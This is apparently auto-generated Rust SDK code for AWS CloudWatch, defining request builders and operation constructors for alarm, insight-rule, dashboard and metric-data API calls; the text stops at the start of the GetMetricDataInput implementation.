#[doc(hidden)]
pub type DisableAlarmActionsInputOperationOutputAlias = crate::operation::DisableAlarmActions;
#[doc(hidden)]
pub type DisableAlarmActionsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DisableAlarmActionsInput {
/// Consumes the builder and constructs an Operation<[`DisableAlarmActions`](crate::operation::DisableAlarmActions)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DisableAlarmActions,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_disable_alarm_actions(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DisableAlarmActions::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DisableAlarmActions",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DisableAlarmActionsInput`](crate::input::DisableAlarmActionsInput)
pub fn builder() -> crate::input::disable_alarm_actions_input::Builder {
crate::input::disable_alarm_actions_input::Builder::default()
}
}
/// See [`DisableInsightRulesInput`](crate::input::DisableInsightRulesInput)
pub mod disable_insight_rules_input {
/// A builder for [`DisableInsightRulesInput`](crate::input::DisableInsightRulesInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) rule_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
pub fn rule_names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.rule_names.unwrap_or_default();
v.push(input.into());
self.rule_names = Some(v);
self
}
pub fn set_rule_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.rule_names = input;
self
}
/// Consumes the builder and constructs a [`DisableInsightRulesInput`](crate::input::DisableInsightRulesInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DisableInsightRulesInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DisableInsightRulesInput {
rule_names: self.rule_names,
})
}
}
}
#[doc(hidden)]
pub type DisableInsightRulesInputOperationOutputAlias = crate::operation::DisableInsightRules;
#[doc(hidden)]
pub type DisableInsightRulesInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DisableInsightRulesInput {
/// Consumes the builder and constructs an Operation<[`DisableInsightRules`](crate::operation::DisableInsightRules)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DisableInsightRules,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_disable_insight_rules(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DisableInsightRules::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DisableInsightRules",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DisableInsightRulesInput`](crate::input::DisableInsightRulesInput)
pub fn builder() -> crate::input::disable_insight_rules_input::Builder {
crate::input::disable_insight_rules_input::Builder::default()
}
}
/// See [`EnableAlarmActionsInput`](crate::input::EnableAlarmActionsInput)
pub mod enable_alarm_actions_input {
/// A builder for [`EnableAlarmActionsInput`](crate::input::EnableAlarmActionsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) alarm_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
pub fn alarm_names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.alarm_names.unwrap_or_default();
v.push(input.into());
self.alarm_names = Some(v);
self
}
pub fn set_alarm_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.alarm_names = input;
self
}
/// Consumes the builder and constructs a [`EnableAlarmActionsInput`](crate::input::EnableAlarmActionsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::EnableAlarmActionsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::EnableAlarmActionsInput {
alarm_names: self.alarm_names,
})
}
}
}
#[doc(hidden)]
pub type EnableAlarmActionsInputOperationOutputAlias = crate::operation::EnableAlarmActions;
#[doc(hidden)]
pub type EnableAlarmActionsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl EnableAlarmActionsInput {
/// Consumes the builder and constructs an Operation<[`EnableAlarmActions`](crate::operation::EnableAlarmActions)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::EnableAlarmActions,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_enable_alarm_actions(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::EnableAlarmActions::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"EnableAlarmActions",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`EnableAlarmActionsInput`](crate::input::EnableAlarmActionsInput)
pub fn builder() -> crate::input::enable_alarm_actions_input::Builder {
crate::input::enable_alarm_actions_input::Builder::default()
}
}
/// See [`EnableInsightRulesInput`](crate::input::EnableInsightRulesInput)
pub mod enable_insight_rules_input {
/// A builder for [`EnableInsightRulesInput`](crate::input::EnableInsightRulesInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) rule_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
pub fn rule_names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.rule_names.unwrap_or_default();
v.push(input.into());
self.rule_names = Some(v);
self
}
pub fn set_rule_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.rule_names = input;
self
}
/// Consumes the builder and constructs a [`EnableInsightRulesInput`](crate::input::EnableInsightRulesInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::EnableInsightRulesInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::EnableInsightRulesInput {
rule_names: self.rule_names,
})
}
}
}
#[doc(hidden)]
pub type EnableInsightRulesInputOperationOutputAlias = crate::operation::EnableInsightRules;
#[doc(hidden)]
pub type EnableInsightRulesInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl EnableInsightRulesInput {
/// Consumes the builder and constructs an Operation<[`EnableInsightRules`](crate::operation::EnableInsightRules)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::EnableInsightRules,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_enable_insight_rules(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::EnableInsightRules::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"EnableInsightRules",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`EnableInsightRulesInput`](crate::input::EnableInsightRulesInput)
pub fn builder() -> crate::input::enable_insight_rules_input::Builder {
crate::input::enable_insight_rules_input::Builder::default()
}
}
/// See [`GetDashboardInput`](crate::input::GetDashboardInput)
pub mod get_dashboard_input {
/// A builder for [`GetDashboardInput`](crate::input::GetDashboardInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) dashboard_name: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The name of the dashboard to be described.</p>
pub fn dashboard_name(mut self, input: impl Into<std::string::String>) -> Self {
self.dashboard_name = Some(input.into());
self
}
pub fn set_dashboard_name(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.dashboard_name = input;
self
}
/// Consumes the builder and constructs a [`GetDashboardInput`](crate::input::GetDashboardInput)
pub fn build(
self,
) -> std::result::Result<crate::input::GetDashboardInput, smithy_http::operation::BuildError>
{
Ok(crate::input::GetDashboardInput {
dashboard_name: self.dashboard_name,
})
}
}
}
#[doc(hidden)]
pub type GetDashboardInputOperationOutputAlias = crate::operation::GetDashboard;
#[doc(hidden)]
pub type GetDashboardInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl GetDashboardInput {
/// Consumes the builder and constructs an Operation<[`GetDashboard`](crate::operation::GetDashboard)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::GetDashboard,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body =
crate::operation_ser::serialize_operation_get_dashboard(&self).map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::GetDashboard::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"GetDashboard",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`GetDashboardInput`](crate::input::GetDashboardInput)
pub fn builder() -> crate::input::get_dashboard_input::Builder {
crate::input::get_dashboard_input::Builder::default()
}
}
/// See [`GetInsightRuleReportInput`](crate::input::GetInsightRuleReportInput)
pub mod get_insight_rule_report_input {
/// A builder for [`GetInsightRuleReportInput`](crate::input::GetInsightRuleReportInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) rule_name: std::option::Option<std::string::String>,
pub(crate) start_time: std::option::Option<smithy_types::Instant>,
pub(crate) end_time: std::option::Option<smithy_types::Instant>,
pub(crate) period: std::option::Option<i32>,
pub(crate) max_contributor_count: std::option::Option<i32>,
pub(crate) metrics: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) order_by: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The name of the rule that you want to see data from.</p>
pub fn rule_name(mut self, input: impl Into<std::string::String>) -> Self {
self.rule_name = Some(input.into());
self
}
pub fn set_rule_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.rule_name = input;
self
}
/// <p>The start time of the data to use in the report. When used in a raw HTTP Query API, it is formatted as
/// <code>yyyy-MM-dd'T'HH:mm:ss</code>. For example,
/// <code>2019-07-01T23:59:59</code>.</p>
pub fn start_time(mut self, input: smithy_types::Instant) -> Self {
self.start_time = Some(input);
self
}
pub fn set_start_time(mut self, input: std::option::Option<smithy_types::Instant>) -> Self {
self.start_time = input;
self
}
/// <p>The end time of the data to use in the report. When used in a raw HTTP Query API, it is formatted as
/// <code>yyyy-MM-dd'T'HH:mm:ss</code>. For example,
/// <code>2019-07-01T23:59:59</code>.</p>
pub fn end_time(mut self, input: smithy_types::Instant) -> Self {
self.end_time = Some(input);
self
}
pub fn set_end_time(mut self, input: std::option::Option<smithy_types::Instant>) -> Self {
self.end_time = input;
self
}
/// <p>The period, in seconds, to use for the statistics in the <code>InsightRuleMetricDatapoint</code> results.</p>
pub fn period(mut self, input: i32) -> Self {
self.period = Some(input);
self
}
pub fn set_period(mut self, input: std::option::Option<i32>) -> Self {
self.period = input;
self
}
/// <p>The maximum number of contributors to include in the report. The range is 1 to 100. If you omit this, the default of 10 is used.</p>
pub fn max_contributor_count(mut self, input: i32) -> Self {
self.max_contributor_count = Some(input);
self
}
pub fn set_max_contributor_count(mut self, input: std::option::Option<i32>) -> Self {
self.max_contributor_count = input;
self
}
pub fn metrics(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.metrics.unwrap_or_default();
v.push(input.into());
self.metrics = Some(v);
self
}
pub fn set_metrics(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.metrics = input;
self
}
/// <p>Determines what statistic to use to rank the contributors. Valid values are SUM and MAXIMUM.</p>
pub fn order_by(mut self, input: impl Into<std::string::String>) -> Self {
self.order_by = Some(input.into());
self
}
pub fn set_order_by(mut self, input: std::option::Option<std::string::String>) -> Self {
self.order_by = input;
self
}
/// Consumes the builder and constructs a [`GetInsightRuleReportInput`](crate::input::GetInsightRuleReportInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::GetInsightRuleReportInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::GetInsightRuleReportInput {
rule_name: self.rule_name,
start_time: self.start_time,
end_time: self.end_time,
period: self.period,
max_contributor_count: self.max_contributor_count,
metrics: self.metrics,
order_by: self.order_by,
})
}
}
}
#[doc(hidden)]
pub type GetInsightRuleReportInputOperationOutputAlias = crate::operation::GetInsightRuleReport;
#[doc(hidden)]
pub type GetInsightRuleReportInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl GetInsightRuleReportInput {
/// Consumes the builder and constructs an Operation<[`GetInsightRuleReport`](crate::operation::GetInsightRuleReport)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::GetInsightRuleReport,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_get_insight_rule_report(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::GetInsightRuleReport::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"GetInsightRuleReport",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`GetInsightRuleReportInput`](crate::input::GetInsightRuleReportInput)
pub fn builder() -> crate::input::get_insight_rule_report_input::Builder {
crate::input::get_insight_rule_report_input::Builder::default()
}
}
/// See [`GetMetricDataInput`](crate::input::GetMetricDataInput)
pub mod get_metric_data_input {
/// A builder for [`GetMetricDataInput`](crate::input::GetMetricDataInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) metric_data_queries:
std::option::Option<std::vec::Vec<crate::model::MetricDataQuery>>,
pub(crate) start_time: std::option::Option<smithy_types::Instant>,
pub(crate) end_time: std::option::Option<smithy_types::Instant>,
pub(crate) next_token: std::option::Option<std::string::String>,
pub(crate) scan_by: std::option::Option<crate::model::ScanBy>,
pub(crate) max_datapoints: std::option::Option<i32>,
pub(crate) label_options: std::option::Option<crate::model::LabelOptions>,
}
impl Builder {
pub fn metric_data_queries(
mut self,
input: impl Into<crate::model::MetricDataQuery>,
) -> Self {
let mut v = self.metric_data_queries.unwrap_or_default();
v.push(input.into());
self.metric_data_queries = Some(v);
self
}
pub fn set_metric_data_queries(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::MetricDataQuery>>,
) -> Self {
self.metric_data_queries = input;
self
}
/// <p>The time stamp indicating the earliest data to be returned.</p>
/// <p>The value specified is inclusive; results include data points with the specified time stamp. </p>
/// <p>CloudWatch rounds the specified time stamp as follows:</p>
/// <ul>
/// <li>
/// <p>Start time less than 15 days ago - Round down to the nearest whole minute.
/// For example, 12:32:34 is rounded down to 12:32:00.</p>
/// </li>
/// <li>
/// <p>Start time between 15 and 63 days ago - Round down to the nearest 5-minute clock interval.
/// For example, 12:32:34 is rounded down to 12:30:00.</p>
/// </li>
/// <li>
/// <p>Start time greater than 63 days ago - Round down to the nearest 1-hour clock interval.
/// For example, 12:32:34 is rounded down to 12:00:00.</p>
/// </li>
/// </ul>
/// <p>If you set <code>Period</code> to 5, 10, or 30, the start time of your request is
/// rounded down to the nearest time that corresponds to even 5-, 10-, or 30-second divisions
/// of a minute. For example, if you make a query at (HH:mm:ss) 01:05:23 for the previous
/// 10-second period, the start time of your request is rounded down and you receive data from 01:05:10 to
/// 01:05:20. If you make a query at 15:07:17 for the previous 5 minutes of data, using a
/// period of 5 seconds, you receive data
/// timestamped between 15:02:15 and 15:07:15.
/// </p>
/// <p>For better performance, specify <code>StartTime</code> and <code>EndTime</code>
/// values that align with the value of the metric's <code>Period</code> and sync up with
/// the beginning and end of an hour. For example, if the <code>Period</code> of a metric
/// is 5 minutes, specifying 12:05 or 12:30 as <code>StartTime</code> can get a faster response
/// from CloudWatch than setting 12:07 or 12:29 as the <code>StartTime</code>.</p>
pub fn start_time(mut self, input: smithy_types::Instant) -> Self {
self.start_time = Some(input);
self
}
pub fn set_start_time(mut self, input: std::option::Option<smithy_types::Instant>) -> Self {
self.start_time = input;
self
}
/// <p>The time stamp indicating the latest data to be returned.</p>
/// <p>The value specified is exclusive; results include data points up to the specified time stamp.</p>
/// <p>For better performance, specify <code>StartTime</code> and <code>EndTime</code>
/// values that align with the value of the metric's <code>Period</code> and sync up with
/// the beginning and end of an hour. For example, if the <code>Period</code> of a metric
/// is 5 minutes, specifying 12:05 or 12:30 as <code>EndTime</code> can get a faster response
/// from CloudWatch than setting 12:07 or 12:29 as the <code>EndTime</code>.</p>
pub fn end_time(mut self, input: smithy_types::Instant) -> Self {
self.end_time = Some(input);
self
}
pub fn set_end_time(mut self, input: std::option::Option<smithy_types::Instant>) -> Self {
self.end_time = input;
self
}
/// <p>Include this value, if it was returned by the previous <code>GetMetricData</code> operation,
/// to get the next set of data points.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.next_token = Some(input.into());
self
}
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.next_token = input;
self
}
/// <p>The order in which data points should be returned. <code>TimestampDescending</code> returns the newest data first and paginates
/// when the <code>MaxDatapoints</code> limit is reached. <code>TimestampAscending</code> returns the oldest data first and paginates
/// when the <code>MaxDatapoints</code> limit is reached.</p>
pub fn scan_by(mut self, input: crate::model::ScanBy) -> Self {
self.scan_by = Some(input);
self
}
pub fn set_scan_by(mut self, input: std::option::Option<crate::model::ScanBy>) -> Self {
self.scan_by = input;
self
}
/// <p>The maximum number of data points the request should return before paginating. If you omit
/// this, the default of 100,800 is used.</p>
pub fn max_datapoints(mut self, input: i32) -> Self {
self.max_datapoints = Some(input);
self
}
pub fn set_max_datapoints(mut self, input: std::option::Option<i32>) -> Self {
self.max_datapoints = input;
self
}
/// <p>This structure includes the <code>Timezone</code> parameter, which you can use
/// to specify your time zone so that the labels of returned data display the
/// correct time
/// for your time zone. </p>
pub fn label_options(mut self, input: crate::model::LabelOptions) -> Self {
self.label_options = Some(input);
self
}
pub fn set_label_options(
mut self,
input: std::option::Option<crate::model::LabelOptions>,
) -> Self {
self.label_options = input;
self
}
/// Consumes the builder and constructs a [`GetMetricDataInput`](crate::input::GetMetricDataInput)
pub fn build(
self,
) -> std::result::Result<crate::input::GetMetricDataInput, smithy_http::operation::BuildError>
{
Ok(crate::input::GetMetricDataInput {
metric_data_queries: self.metric_data_queries,
start_time: self.start_time,
end_time: self.end_time,
next_token: self.next_token,
scan_by: self.scan_by,
max_datapoints: self.max_datapoints,
label_options: self.label_options,
})
}
}
}
#[doc(hidden)]
pub type GetMetricDataInputOperationOutputAlias = crate::operation::GetMetricData;
#[doc(hidden)]
pub type GetMetricDataInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl GetMetricDataInput {
